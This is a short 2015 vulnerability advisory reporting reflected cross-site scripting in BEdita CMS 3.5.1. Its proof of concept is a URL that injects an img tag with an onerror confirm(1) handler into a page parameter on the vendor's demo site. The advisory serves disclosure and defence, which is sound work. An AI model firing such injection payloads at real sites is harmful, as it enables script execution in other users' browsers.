BEdita CMS 3.5.1 Cross Site Scripting

2015.03.04

Credit: Provensec

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-79

# Affected software: BEdita CMS
# Type of vulnerability: cross site scripting
# URL: bedita.com
# Discovered by: Provensec
# Website: http://www.provensec.com
# Description: *BEdita* is a web development *framework* that comes with a full
featured CMS out of the box.
# Proof of concept
javascript executes on login page if you not logged in or no session
initiated other wise javascript on respected page only
http://i.imgur.com/1wU6lX7.png
http://manage.demo.bedita.com/documents/index/id:%22%3E%3Cimg%20src=d%20onerror=confirm%281%29;%3E

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

BEdita CMS 3.5.1 Cross Site Scripting

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.